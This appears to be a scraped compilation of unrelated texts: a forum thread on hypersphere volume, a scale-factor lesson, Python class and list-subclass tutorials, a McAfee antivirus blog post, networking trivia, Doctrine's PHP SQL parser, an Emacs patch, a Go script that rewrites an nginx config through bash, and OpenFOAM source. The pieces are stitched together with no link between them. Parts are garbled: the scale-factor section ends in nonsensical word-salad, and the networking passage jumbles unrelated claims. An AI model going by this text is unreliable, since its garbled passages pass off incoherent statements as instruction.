[itex]V_n(R) = \frac{\pi^{n/2} R^n}{\Gamma(n/2+1)}[/itex]
[itex]S_n(R) = \frac{2 \pi^{n/2} R^{n-1}}{\Gamma(n/2)}[/itex]
3. The attempt at a solution
I know that both go to zero just by observation, but that's not really mathematical. I was able to show that, if I put the hypersphere within a hypercube of side length A and subtract their volumes, the difference goes to A^n, implying that the difference in their volumes goes to the volume of the hypercube. But I'm not sure how solid that is -- I feel it's more of an argument for the volume going to zero rather than a proof. And it doesn't help me with the surface 'area' anyway.
EDIT: I also considered using Stirling's approximation:
[itex] \Gamma(n+1) \approx \left( \frac{n}{e} \right)^n \sqrt{2 \pi n} [/itex]
Then, inputting that into the above for Vn, I get:
[itex]\lim_{n \to \infty} \frac{1}{\sqrt{\pi n}} \left( \frac{2 \pi e R^2}{n} \right)^{n/2} [/itex]
I suppose that's a decent way of showing that the limit is equal to zero?
Last edited: Mar 7, 2012
3. Mar 7, 2012 #2
The denominators you have are gamma functions; they grow faster than exponentials. I think you can just claim that S and V go to zero; the details are probably not very interesting anyway.
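For what it's worth, the claim is easy to check numerically with the two formulas from the problem statement (a quick Python sketch; the function names are mine):

```python
import math

def hypersphere_volume(n, r=1.0):
    """V_n(R) = pi^(n/2) R^n / Gamma(n/2 + 1)"""
    return math.pi ** (n / 2) * r ** n / math.gamma(n / 2 + 1)

def hypersphere_surface(n, r=1.0):
    """S_n(R) = 2 pi^(n/2) R^(n-1) / Gamma(n/2)"""
    return 2 * math.pi ** (n / 2) * r ** (n - 1) / math.gamma(n / 2)

for n in (2, 5, 10, 50, 100):
    print(n, hypersphere_volume(n), hypersphere_surface(n))
# Both quantities peak at small n and then collapse toward zero,
# since the gamma function in the denominator outgrows pi^(n/2) R^n.
```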
Scale factor
Similar shapes have the same form but different sizes. The scale factor describes the size relationship: it is the ratio of a length on the image to the corresponding length on the original figure. A scale factor greater than 1 enlarges the figure; a scale factor less than 1 reduces it. For example, a scale factor of 2 means the new shape is twice the size of the original. If you begin with the larger figure, your scale factor will be greater than one; if you begin with the smaller figure, it will be less than one.
To find a scale factor between two similar figures, find two corresponding sides and write the ratio of one to the other, comparing the quantities in the same units (convert first if necessary, e.g. 1 ft = 12 in).
Example 1: a square of side 6 is mapped to a square of side 3.
Step 1: 6 x scale factor = 3.
Step 2: scale factor = 3/6 (divide each side by 6).
Step 3: scale factor = 1/2, i.e. 1:2.
Hence, the scale factor from the larger square to the smaller square is 1:2.
Example 2: find the scale factor of two similar rectangles, 24 x 12 and 20 x 10. Dividing corresponding sides gives 20/24 = 10/12 = 5/6, so the scale factor from the larger rectangle to the smaller is 5/6, and every corresponding length changes by that factor.
Enlarging a figure by a scale factor k multiplies every length by k: a circle of radius r enlarged by a factor k greater than 1 has radius kr, its perimeter becomes k times the original perimeter, and its area becomes k^2 times the original area. For a 3D shape, volume scales by the cube of the factor: the new volume of an enlarged solid is the old volume multiplied by k^3.
Scale factors also describe dilations. An art supply store sells several sizes of drawing triangles, all dilations of a single basic triangle; for similar triangles ABC ~ DEF, the scale factor of the dilation is the ratio of corresponding side lengths. For instance, if the actual length of an object is 39.5 cm and the image shows 4.2 cm, the scale factor is 4.2/39.5.
The same idea solves scale model problems: a house blueprint states its scale, and writing an equation with the scale factor converts a measurement on the blueprint into the measurement on the actual house (or vice versa).
In CAD, the drawing scale factor is the conversion factor between a measurement on the plot and the measurement in the real world. When drawings are printed for production, they are represented much smaller than the objects they depict, so calculating the scale factor is a simple but important task, needed to adequately size dimensions, text, blocks, and lines. To scale an object in AutoCAD: click Home tab > Modify panel > Scale, select the object, specify the base point, then enter the scale factor or drag and click to specify a new scale.
Is 1:2 quantities using the same units, it means we 're having trouble loading resources! Equation using the scale factor of a 2D shape web filter, please make sure that new! Are all enlargements of shape a and lines behind a web filter, please make sure that the first is! Figure to another one factor that enlarges Rectangle a onto Rectangle B. Ex2Here are two similar right-angled.... You 'll see how to find the scale factor in CAD is,,. Just plug in values for each value and scale factor is a number by which a is. By the conversion rate of 1 ft = 12 in as part of figure,! We discuss increasing the size in which we create the shape bigger is described by its scale if! Rectangles are similar get an opportunity to work out problems involving scale factor of 5/2 Divide each by.
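The arithmetic above can be checked with a few lines of Python (the numbers are the worked examples from the text):

```python
# Scale-factor arithmetic from the worked examples above.

def scale_factor(image_length, original_length):
    """Ratio of a length on the image to the corresponding original length."""
    return image_length / original_length

# 6 x scale factor = 3  ->  k = 3 / 6 (a reduction)
k = scale_factor(3, 6)
print(k)  # 0.5

# Cylinder: measured diameter 70.2 mm vs. an original measurement of 5 mm
print(scale_factor(70.2, 5))  # about 14.04, an enlargement

# Enlarging by k multiplies perimeter by k, area by k**2, volume by k**3.
k = 2
print(10 * k, 25 * k**2, 40 * k**3)  # 20 100 320
```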
Learn about programming Classes and Objects in Python
Objects are an encapsulation of variables and functions into a single entity.
Objects get their variables and functions from classes. Classes are essentially a template to create your objects.
A very basic class would look something like this:
class MyClass:
    variable = "blah"

    def function(self):
        print("This is a message inside the class.")
We’ll explain why you have to include that “self” as a parameter a little bit later. First, to assign the above class (template) to an object you would do the following:
class MyClass:
    variable = "blah"

    def function(self):
        print("This is a message inside the class.")

myobjectx = MyClass()
Now the variable “myobjectx” holds an object of the class “MyClass” that contains the variable and the function defined within the class “MyClass”.
Accessing Object Variables
To access the variable inside of the newly created object “myobjectx” you would do the following:
class MyClass:
    variable = "blah"

    def function(self):
        print("This is a message inside the class.")

myobjectx = MyClass()

print(myobjectx.variable)
So, for instance, the below would output the string “blah“:
class MyClass:
    variable = "blah"

    def function(self):
        print("This is a message inside the class.")

myobjectx = MyClass()

print(myobjectx.variable)
You can create multiple different objects that are of the same class (have the same variables and functions defined).
However, each object contains independent copies of the variables defined in the class. For instance, if we were to
define another object with the “MyClass” class and then change the string in the variable above:
class MyClass:
    variable = "blah"

    def function(self):
        print("This is a message inside the class.")

myobjectx = MyClass()
myobjecty = MyClass()

myobjecty.variable = "yackity"

# Then print out both values
print(myobjectx.variable)
print(myobjecty.variable)
Accessing Object Functions
To access a function inside of an object you use notation similar to accessing a variable:
class MyClass:
    variable = "blah"

    def function(self):
        print("This is a message inside the class.")

myobjectx = MyClass()

myobjectx.function()
The above would print out the message, “This is a message inside the class.”
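The tutorial promised to explain “self” later; the short version is that when you access a function through an object, Python automatically passes that object in as the first argument. A quick sketch with the same “MyClass”:

```python
class MyClass:
    variable = "blah"

    def function(self):
        print("This is a message inside the class.")

myobjectx = MyClass()

# These two calls are equivalent: the object before the dot becomes "self".
myobjectx.function()
MyClass.function(myobjectx)
```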
Exercise
We have a class defined for vehicles. Create two new vehicles called car1 and car2. Set car1 to be a red convertible
worth $60,000.00 with a name of Fer, and car2 to be a blue van named Jump worth $10,000.00.
# this is the answer code.
# define the Vehicle class
class Vehicle:
    name = ""
    kind = "car"
    color = ""
    value = 100.00

    def description(self):
        desc_str = "%s is a %s %s worth $%.2f." % (self.name, self.color, self.kind, self.value)
        return desc_str
# your code goes here
car1 = Vehicle()
car1.name = "Fer"
car1.color = "red"
car1.kind = "convertible"
car1.value = 60000.00
car2 = Vehicle()
car2.name = "Jump"
car2.color = "blue"
car2.kind = "van"
car2.value = 10000.00
# test code
print(car1.description())
print(car2.description())
Note: Running the code above while it is still unfinished (before car1 and car2 are defined) will yield the following error:
Traceback (most recent call last):
File “script.py”, line 13, in
print(car1.description())
NameError: name ‘car1’ is not defined
OR
NameError: name ‘car1’ is not defined on line 13 in main.py
About the Author: Bernard Aybout
In the land of bytes and bits, a father of three sits, With a heart for tech and coding kits, in IT he never quits. At Magna's door, he took his stance, in Canada's wide expanse, At Karmax Heavy Stamping - Cosma's dance, he gave his career a chance. With a passion deep for teaching code, to the young minds he showed, The path where digital seeds are sowed, in critical thinking mode. But alas, not all was bright and fair, at Magna's lair, oh despair, Harassment, intimidation, a chilling air, made the workplace hard to bear. Management's maze and morale's dip, made our hero's spirit flip, In a demoralizing grip, his well-being began to slip. So he bid adieu to Magna's scene, from the division not so serene, Yet in tech, his interest keen, continues to inspire and convene.
Less Is More: Why One Antivirus Software Is All You Need
Personal devices and the information they carry are incredibly valuable to their owners. It is only natural to want to protect your device like a royal family fortifying a medieval castle. Unlike medieval castles that depended upon layers and layers of protection (moats, drawbridges, spiky gates, etc.), personal devices thrive on just one defense: a devoted guard called antivirus software.
Increasing your personal device’s security detail with more than one guard, or antivirus software, is actually less effective than using a single, comprehensive option. Microsoft operating systems recognize the detriment of running two antivirus software programs simultaneously for real-time protection. Microsoft Windows automatically unregisters additional programs so they do not compete against each other. In theory, if you have a Microsoft device, you could run on-demand or scheduled scans from two different antivirus products without the operating system disabling one of them. But why invest in multiple software products where one will do?
If you do not have a Microsoft device, here is what could happen to your device if you run more than one antivirus program at a time, and why you should consider investing in only one top-notch product.
Fight Over Potential Viruses
Antivirus programs want to impress you. Each wants to be the one to catch a virus and present you with the culprit, like a cat with a mouse. When antivirus software captures a virus, it locks it in a secure place to neutralize it. If you have two programs running simultaneously, they could engage in a tussle over who gets to scan, report, and remove the virus. This added activity could cause your computer to crash or use up your device’s memory.
Report Each Other as Suspicious
Antivirus software quietly monitors and collects information about how your system runs, which is similar to how viruses operate. One software could mark the other as suspicious because real-time protection software is lurking in the background. So, while one antivirus program is busy blowing the whistle on the other, malicious code could quietly slip by.
Additionally, users could be buried under a barrage of red-flag notifications about each software reporting the other as suspicious. Some users become so distracted by the onslaught of notifications that they deactivate both programs, or ignore notifications altogether, leaving the device vulnerable to real threats.
Drain Your Battery and Slow Down Your Device
Running one antivirus software does not drain your battery, and it can actually make your device faster. However, two antivirus programs will not double your operating speed. In fact, it will make it run much slower and drain your battery in the process. With two programs running real-time protection constantly in the background, device performance is extremely compromised.
Antivirus Software Best Practices
There is no reason to invest in two antivirus programs when one solid software will more than do the trick to protect your device. Here are some best practices to get the most out of your antivirus software:
1. Back up files regularly
One habit you should adopt is backing up your files regularly. You never know when malware could hit and corrupt your data. Add it to your weekly routine to sync with the cloud and back up your most important files to an external hard drive.
2. Keep your software up to date
Whenever your software prompts you to install an update, do it! New cyber threats are evolving every day, and the best way to protect against them is to allow your software to stay as up-to-date as possible.
3. Read the results reports
Always read your antivirus results reports. These reports let you know the suspicious suspects your software was busy rounding up. It will give you a good idea of the threats your devices face and perhaps the schemes that you unknowingly fell into, such as clicking on a link in a phishing email. This information can also help you improve your online safety habits.
Quality Over Quantity
In the end, make sure that the antivirus software you choose is as robust as possible. For example, McAfee Total Protection can secure up to 10 devices and even offers features beyond antivirus protection, including safe web browsing, PC optimization, and home network security.
Stay Updated
To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, subscribe to our newsletter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.
Amazon Simple Storage Service S
Intranets can serve as highly effective instruments for communication inside a company. A good real-world example of where an intranet helped an organization communicate is when Nestle had a variety of food processing plants in Scandinavia. Their central support system had to cope with a lot of requests for data every day. When Nestle decided to invest in an intranet, they quickly realized the savings.
An ebusiness entails the whole process of operating a company online. Put simply, it is all the activity that takes place with an online business. Private labeling is a more appropriate ecommerce approach for companies that may not have large upfront capital or do not have their own factory space to manufacture goods.
TCP/IP has been adopted as a network standard for Internet communications. Thus, all hosts on the Internet follow the rules defined in this standard. Internet communications also use other standards, such as the Ethernet standard, as data is routed to its destination. A bus network consists of a single central cable, to which all computers and other devices connect.
A solution with a pH of 7 is said to be neutral, a solution with a pH greater than 7 is basic, and a solution with a pH less than 7 is acidic. Write a script that will prompt the user for the pH of a solution and will print whether it is neutral, basic, or acidic.
________ variables are defined outside all functions and are accessible to any function within their scope.
Larger networks usually use a switch, while smaller networks use a hub. Using a network, people communicate efficiently and easily via email, IM, blogs, and so forth.
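A minimal version of the pH exercise described above might look like this (the interactive prompt is commented out so the classification logic can be checked directly):

```python
def classify_ph(ph):
    """Return 'neutral' for pH 7, 'basic' above 7, and 'acidic' below 7."""
    if ph == 7:
        return "neutral"
    elif ph > 7:
        return "basic"
    else:
        return "acidic"

# Prompt the user, as the exercise asks (uncomment to run interactively):
# ph = float(input("Enter the pH of the solution: "))
# print("The solution is", classify_ph(ph))

print(classify_ph(7.0))   # neutral
print(classify_ph(11.2))  # basic
print(classify_ph(4.5))   # acidic
```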
Others use a special type of wiring that allows up to 260 connections. Since the storage available in cache servers is limited, caching involves a process of selecting the contents worth storing. Several cache algorithms have been designed to perform this process, which, in general, leads to storing the most popular contents. Cached contents are retrieved with a higher QoE (e.g., lower latency), and caching can therefore be considered a form of traffic differentiation. However, caching is not generally seen as a form of discriminatory traffic differentiation.
<?php
/*
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
 * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
 * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 * This software consists of voluntary contributions made by many individuals
 * and is licensed under the MIT license. For more information, see
 * <http://www.doctrine-project.org>.
 */

namespace Doctrine\DBAL;

use Doctrine\DBAL\Connection;

/**
 * Utility class that parses sql statements with regard to types and parameters.
 *
 * @license http://www.opensource.org/licenses/lgpl-license.php LGPL
 * @link    www.doctrine-project.com
 * @since   2.0
 * @author  Benjamin Eberlei <[email protected]>
 */
class SQLParserUtils
{
    /**
     * Get an array of the placeholders in an sql statements as keys and their positions in the query string.
     *
     * Returns an integer => integer pair (indexed from zero) for a positional statement
     * and a string => int[] pair for a named statement.
     *
     * @param string $statement
     * @param bool $isPositional
     * @return array
     */
    static public function getPlaceholderPositions($statement, $isPositional = true)
    {
        $match = ($isPositional) ? '?' : ':';
        if (strpos($statement, $match) === false) {
            return array();
        }

        $count = 0;
        $inLiteral = false; // a valid query never starts with quotes
        $stmtLen = strlen($statement);
        $paramMap = array();
        for ($i = 0; $i < $stmtLen; $i++) {
            if ($statement[$i] == $match && !$inLiteral && ($isPositional || $statement[$i+1] != '=')) {
                // real positional parameter detected
                if ($isPositional) {
                    $paramMap[$count] = $i;
                } else {
                    $name = "";
                    // TODO: Something faster/better to match this than regex?
                    for ($j = $i + 1; ($j < $stmtLen && preg_match('(([a-zA-Z0-9_]{1}))', $statement[$j])); $j++) {
                        $name .= $statement[$j];
                    }
                    $paramMap[$i] = $name; // named parameters can be duplicated!
                    $i = $j;
                }
                ++$count;
            } else if ($statement[$i] == "'" || $statement[$i] == '"') {
                $inLiteral = ! $inLiteral; // switch state!
            }
        }

        return $paramMap;
    }

    /**
     * For a positional query this method can rewrite the sql statement with regard to array parameters.
     *
     * @param string $query  The SQL query to execute.
     * @param array  $params The parameters to bind to the query.
     * @param array  $types  The types the previous parameters are in.
     *
     * @return array
     */
    static public function expandListParameters($query, $params, $types)
    {
        $isPositional = is_int(key($params));
        $arrayPositions = array();
        $bindIndex = -1;

        foreach ($types as $name => $type) {
            ++$bindIndex;

            if ($type !== Connection::PARAM_INT_ARRAY && $type !== Connection::PARAM_STR_ARRAY) {
                continue;
            }

            if ($isPositional) {
                $name = $bindIndex;
            }

            $arrayPositions[$name] = false;
        }

        if (( ! $arrayPositions && $isPositional) || (count($params) != count($types))) {
            return array($query, $params, $types);
        }

        $paramPos = self::getPlaceholderPositions($query, $isPositional);

        if ($isPositional) {
            $paramOffset = 0;
            $queryOffset = 0;

            foreach ($paramPos as $needle => $needlePos) {
                if ( ! isset($arrayPositions[$needle])) {
                    continue;
                }

                $needle += $paramOffset;
                $needlePos += $queryOffset;
                $count = count($params[$needle]);

                $params = array_merge(
                    array_slice($params, 0, $needle),
                    $params[$needle],
                    array_slice($params, $needle + 1)
                );

                $types = array_merge(
                    array_slice($types, 0, $needle),
                    array_fill(0, $count, $types[$needle] - Connection::ARRAY_PARAM_OFFSET), // array needles are at PDO::PARAM_* + 100
                    array_slice($types, $needle + 1)
                );

                $expandStr = implode(", ", array_fill(0, $count, "?"));
                $query = substr($query, 0, $needlePos) . $expandStr . substr($query, $needlePos + 1);

                $paramOffset += ($count - 1); // Grows larger by number of parameters minus the replaced needle.
                $queryOffset += (strlen($expandStr) - 1);
            }

            return array($query, $params, $types);
        }

        $queryOffset = 0;
        $typesOrd = array();
        $paramsOrd = array();

        foreach ($paramPos as $pos => $paramName) {
            $paramLen = strlen($paramName) + 1;
            $value = $params[$paramName];

            if ( ! isset($arrayPositions[$paramName])) {
                $pos += $queryOffset;
                $queryOffset -= ($paramLen - 1);
                $paramsOrd[] = $value;
                $typesOrd[] = $types[$paramName];
                $query = substr($query, 0, $pos) . '?' . substr($query, ($pos + $paramLen));

                continue;
            }

            $count = count($value);
            $expandStr = $count > 0 ? implode(', ', array_fill(0, $count, '?')) : '?';

            foreach ($value as $val) {
                $paramsOrd[] = $val;
                $typesOrd[] = $types[$paramName] - Connection::ARRAY_PARAM_OFFSET;
            }

            $pos += $queryOffset;
            $queryOffset += (strlen($expandStr) - $paramLen);
            $query = substr($query, 0, $pos) . $expandStr . substr($query, ($pos + $paramLen));
        }

        return array($query, $paramsOrd, $typesOrd);
    }
}
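The positional branch above can be illustrated with a small Python sketch of the same idea. This is not Doctrine's API, just the expansion of array-valued `?` placeholders; it naively splits on `?`, so unlike the PHP code (which tracks `$inLiteral`) it ignores question marks inside quoted string literals:

```python
def expand_positional(query, params, is_array):
    """Expand each array-valued positional parameter into N placeholders.

    is_array[i] is True when params[i] is a list to expand in place
    (the analogue of PARAM_INT_ARRAY / PARAM_STR_ARRAY).
    """
    parts = query.split("?")          # naive: ignores '?' inside literals
    assert len(parts) == len(params) + 1, "one value per placeholder"
    rebuilt = [parts[0]]
    flat = []
    for i, value in enumerate(params):
        if is_array[i]:
            rebuilt.append(", ".join(["?"] * len(value)))
            flat.extend(value)
        else:
            rebuilt.append("?")
            flat.append(value)
        rebuilt.append(parts[i + 1])
    return "".join(rebuilt), flat

q, p = expand_positional(
    "SELECT * FROM users WHERE id IN (?) AND status = ?",
    [[1, 2, 3], "active"],
    [True, False],
)
print(q)  # SELECT * FROM users WHERE id IN (?, ?, ?) AND status = ?
print(p)  # [1, 2, 3, 'active']
```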
bug-gnu-emacs
bug#17298: 24.4.50; emacs_backtrace
From: Stefan Monnier
Subject: bug#17298: 24.4.50; emacs_backtrace
Date: Sat, 19 Apr 2014 13:55:39 -0400
User-agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4.50 (gnu/linux)
> I really wish someone who knows those parts of Emacs would look into
> this problem.
I don't know those parts very well, but it seems that the patch below
might make sense.
I have a hard time believing that we've lived with such a bug for so
many years, but this makes the code agree with the comment, and if you
look at the diagram before the function, I think the comment is right
and the code is wrong.
Just to clarify the crucial part of the patch is:
- interval->total_length -= B->total_length - LEFT_TOTAL_LENGTH (interval);
+ interval->total_length -= B->total_length - TOTAL_LENGTH (c);
-- Stefan
=== modified file 'src/intervals.c'
--- src/intervals.c 2014-01-21 02:28:57 +0000
+++ src/intervals.c 2014-04-19 17:51:01 +0000
@@ -334,10 +334,16 @@
static INTERVAL
rotate_right (INTERVAL interval)
{
- INTERVAL i;
+ INTERVAL c;
INTERVAL B = interval->left;
ptrdiff_t old_total = interval->total_length;
+ eassert (TOTAL_LENGTH (interval) > 0);
+ eassert (TOTAL_LENGTH (interval)
+ > TOTAL_LENGTH (B) + TOTAL_LENGTH (interval->right));
+ eassert (TOTAL_LENGTH (B)
+ > TOTAL_LENGTH (B->left) + TOTAL_LENGTH (B->right));
+
/* Deal with any Parent of A; make it point to B. */
if (! ROOT_INTERVAL_P (interval))
{
@@ -348,23 +354,23 @@
}
copy_interval_parent (B, interval);
- /* Make B the parent of A */
- i = B->right;
+ /* Make B the parent of A. */
+ c = B->right;
set_interval_right (B, interval);
set_interval_parent (interval, B);
- /* Make A point to c */
- set_interval_left (interval, i);
- if (i)
- set_interval_parent (i, interval);
+ /* Make A point to c. */
+ set_interval_left (interval, c);
+ if (c)
+ set_interval_parent (c, interval);
/* A's total length is decreased by the length of B and its left child. */
- interval->total_length -= B->total_length - LEFT_TOTAL_LENGTH (interval);
- eassert (TOTAL_LENGTH (interval) >= 0);
+ interval->total_length -= B->total_length - TOTAL_LENGTH (c);
+ eassert (TOTAL_LENGTH (interval) > 0);
/* B must have the same total length of A. */
B->total_length = old_total;
- eassert (TOTAL_LENGTH (B) >= 0);
+ eassert (TOTAL_LENGTH (B) > 0);
return B;
}
@@ -381,7 +387,7 @@
static INTERVAL
rotate_left (INTERVAL interval)
{
- INTERVAL i;
+ INTERVAL c;
INTERVAL B = interval->right;
ptrdiff_t old_total = interval->total_length;
@@ -395,23 +401,23 @@
}
copy_interval_parent (B, interval);
- /* Make B the parent of A */
- i = B->left;
+ /* Make B the parent of A. */
+ c = B->left;
set_interval_left (B, interval);
set_interval_parent (interval, B);
- /* Make A point to c */
- set_interval_right (interval, i);
- if (i)
- set_interval_parent (i, interval);
+ /* Make A point to c. */
+ set_interval_right (interval, c);
+ if (c)
+ set_interval_parent (c, interval);
/* A's total length is decreased by the length of B and its right child. */
- interval->total_length -= B->total_length - RIGHT_TOTAL_LENGTH (interval);
- eassert (TOTAL_LENGTH (interval) >= 0);
+ interval->total_length -= B->total_length - TOTAL_LENGTH (c);
+ eassert (TOTAL_LENGTH (interval) > 0);
/* B must have the same total length of A. */
B->total_length = old_total;
- eassert (TOTAL_LENGTH (B) >= 0);
+ eassert (TOTAL_LENGTH (B) > 0);
return B;
}
Subclassing a list in Python
I'm following an online tutorial and the code is as follows:
class Hands(list):
    def __init__(self, size=0, die_class=None, *args, **kwargs):
        if not die_class:
            raise ValueError("You must provide a die class")
        super().__init__()
        for _ in range(size):
            self.append(die_class())
Basically, it models a player with a number of dice (size) and which dice the player has (die_class).
My confusion is why we need to call super().__init__? I tried running the code without it and it worked fine! Why is the call necessary?
You should call the base class's __init__() to make sure any initialization code it contains gets run. That it (seemingly) works without that call may be a coincidence, or you simply have not run into the resulting problem yet. Even if it works consistently in the Python version and implementation you are currently using, other versions and implementations are not guaranteed to work without calling the base class's __init__ method.
You can also use that call to populate the list with your die objects:
class Hands(list):
    def __init__(self, size=0, die_factory=None):
        if not die_factory:
            raise ValueError('You must provide a die factory')
        super().__init__(die_factory() for _ in range(size))
I have renamed die_class to die_factory, since any object that produces a new die object can be used.
Note: you may be violating the is-a relationship between Hands and list here, unless a Hands object really is a list, that is, all list methods and behavior also make sense for Hands objects.
super() lets you avoid referring to the base class explicitly. More importantly, with multiple inheritance you can do things like this. At the end of the day it is not strictly necessary, it is just good practice.
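A runnable sketch of the populate-in-__init__ approach from the answer above; the FakeDie class is illustrative (the question never shows the real die class):

```python
import random

class FakeDie:
    """Illustrative stand-in for the tutorial's die class."""
    def __init__(self, sides=6):
        self.value = random.randint(1, sides)

class Hands(list):
    def __init__(self, size=0, die_factory=None):
        if not die_factory:
            raise ValueError("You must provide a die factory")
        # The base list initializer both runs list's own setup and
        # fills the new Hands with freshly created dice in one step.
        super().__init__(die_factory() for _ in range(size))

hand = Hands(size=5, die_factory=FakeDie)
print(len(hand))                                  # 5
print(all(isinstance(d, FakeDie) for d in hand))  # True
```

Because Hands really is a list here, everything list supports (len, iteration, indexing, append) works on it unchanged.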
Go-gin: implementing an API to change a file configuration
We have two non-production environments, dev and test. Because of restrictions on WeChat Official Accounts, only two callback domain names can be set; the production environment occupies one, so dev and test have to share the other and switch back and forth. Testers and front-end developers kept asking which environment was active, so I wrote a quick and crude script that receives a parameter, reads a file, applies a regex, and executes Linux commands. (Skipping error handling like this is not advisable.)
Route 1: http://xx.com:8090/wechat returns the current environment.
Route 2: http://xx.com:8090/wechat?env=XX modifies the API proxy environment in the nginx configuration file and reloads it.
Run the program in the background: nohup go run ./wechat_env.go &
package main

import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "os/exec"
    "regexp"

    "github.com/gin-gonic/gin"
)

var r = gin.New()

func main() {
    gin.ForceConsoleColor()
    r.Use(gin.Logger())
    r.Use(gin.Recovery())

    r.GET("/wechat", func(c *gin.Context) {
        env := c.DefaultQuery("env", "")
        filePath := "/etc/nginx/sites-enabled/new_wechat.conf"
        msg := ""
        switch env {
        case "":
            env = GetEnv(filePath)
            msg = "current environment: " + env
        case "dev":
            fallthrough
        case "test":
            // Rewrite the configuration
            conf := ModifyConfig(env)
            // Reload the configuration
            NginxReload(conf, filePath)
            msg = "switched to " + env + " successfully"
        default:
            msg = "invalid env parameter"
        }
        c.JSON(http.StatusOK, gin.H{
            "message": msg,
        })
    })
    r.Run(":8090")
}

// GetEnv extracts the current environment from the config file with a regex.
func GetEnv(filePath string) string {
    conf, _ := ioutil.ReadFile(filePath)
    reg := regexp.MustCompile(`http://local\.yxt-up-api-([a-z]+)`)
    result := reg.FindAllStringSubmatch(string(conf), -1)
    log.Println("current environment: " + result[0][1])
    return result[0][1]
}

// ModifyConfig fills in the config template; it is really just a Sprintf.
func ModifyConfig(env string) string {
    template := `
# %s
server {
    listen 80;
    server_name _;

    root /vda2/var/www/new-wechat/dist;

    location / {
        try_files \$uri \$uri/ /index.html;
    }

    location /api/ {
        proxy_pass http://local.yxt-up-api-%s/;
    }
}
`
    log.Println("switching environment to: " + env)
    return fmt.Sprintf(template, env, env)
}

// NginxReload writes the new config to the file and reloads nginx.
func NginxReload(conf string, filePath string) {
    cmd1 := `echo "` + conf + `" > ` + filePath
    exec.Command("bash", "-c", cmd1).Run()
    err := exec.Command("bash", "-c", "nginx -s reload").Run()
    if err != nil {
        log.Println(err)
    }
}
Origin blog.csdn.net/z772532526/article/details/112479240
/*---------------------------------------------------------------------------*\
  =========                 |
  \\      /  F ield         | OpenFOAM: The Open Source CFD Toolbox
   \\    /   O peration     |
    \\  /    A nd           | Copyright (C) 2011-2016 OpenFOAM Foundation
     \\/     M anipulation  | Copyright (C) 2018 OpenCFD Ltd.
-------------------------------------------------------------------------------
License
    This file is part of OpenFOAM.

    OpenFOAM is free software: you can redistribute it and/or modify it
    under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    OpenFOAM is distributed in the hope that it will be useful, but WITHOUT
    ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
    FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License
    for more details.

    You should have received a copy of the GNU General Public License
    along with OpenFOAM.  If not, see .

\*---------------------------------------------------------------------------*/

#include "globalIndex.H"

// * * * * * * * * * * * * * * * * Constructors  * * * * * * * * * * * * * * //

Foam::globalIndex::globalIndex(Istream& is)
{
    is >> offsets_;
}

// * * * * * * * * * * * * * * * Member Functions  * * * * * * * * * * * * * //

void Foam::globalIndex::reset
(
    const label localSize,
    const int tag,
    const label comm,
    const bool parallel
)
{
    offsets_.resize(Pstream::nProcs(comm)+1);

    labelList localSizes(Pstream::nProcs(comm), Zero);
    localSizes[Pstream::myProcNo(comm)] = localSize;

    if (parallel)
    {
        Pstream::gatherList(localSizes, tag, comm);
        Pstream::scatterList(localSizes, tag, comm);
    }

    label offset = 0;
    offsets_[0] = 0;
    for (label proci = 0; proci < Pstream::nProcs(comm); ++proci)
    {
        const label oldOffset = offset;
        offset += localSizes[proci];

        if (offset < oldOffset)
        {
            FatalErrorInFunction
                << "Overflow : sum of sizes " << localSizes
                << " exceeds capability of label (" << labelMax
                << "). Please recompile with larger datatype for label."
                << exit(FatalError);
        }
        offsets_[proci+1] = offset;
    }
}

void Foam::globalIndex::reset(const label localSize)
{
    offsets_.resize(Pstream::nProcs()+1);

    labelList localSizes(Pstream::nProcs(), Zero);
    localSizes[Pstream::myProcNo()] = localSize;

    Pstream::gatherList(localSizes, Pstream::msgType());
    Pstream::scatterList(localSizes, Pstream::msgType());

    label offset = 0;
    offsets_[0] = 0;
    for (label proci = 0; proci < Pstream::nProcs(); ++proci)
    {
        const label oldOffset = offset;
        offset += localSizes[proci];

        if (offset < oldOffset)
        {
            FatalErrorInFunction
                << "Overflow : sum of sizes " << localSizes
                << " exceeds capability of label (" << labelMax
                << "). Please recompile with larger datatype for label."
                << exit(FatalError);
        }
        offsets_[proci+1] = offset;
    }
}

// * * * * * * * * * * * * * * * Friend Operators  * * * * * * * * * * * * * //

Foam::Istream& Foam::operator>>(Istream& is, globalIndex& gi)
{
    return is >> gi.offsets_;
}

Foam::Ostream& Foam::operator<<(Ostream& os, const globalIndex& gi)
{
    return os << gi.offsets_;
}

// ************************************************************************* //
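Both reset overloads reduce to the same core operation: a prefix sum over the per-processor sizes, guarded by an overflow check. A minimal sketch of that logic (illustrative Python, not part of OpenFOAM; the helper name is my own):

```python
def build_offsets(local_sizes, label_max=2**31 - 1):
    """Compute globalIndex-style offsets: offsets[i] is the global start
    index of processor i, and offsets[-1] is the total size."""
    offsets = [0]
    for size in local_sizes:
        total = offsets[-1] + size
        if total > label_max:  # mirrors the FatalErrorInFunction overflow check
            raise OverflowError("sum of sizes exceeds label capacity")
        offsets.append(total)
    return offsets

# Three processors holding 3, 5 and 2 items respectively:
print(build_offsets([3, 5, 2]))  # → [0, 3, 8, 10]
```

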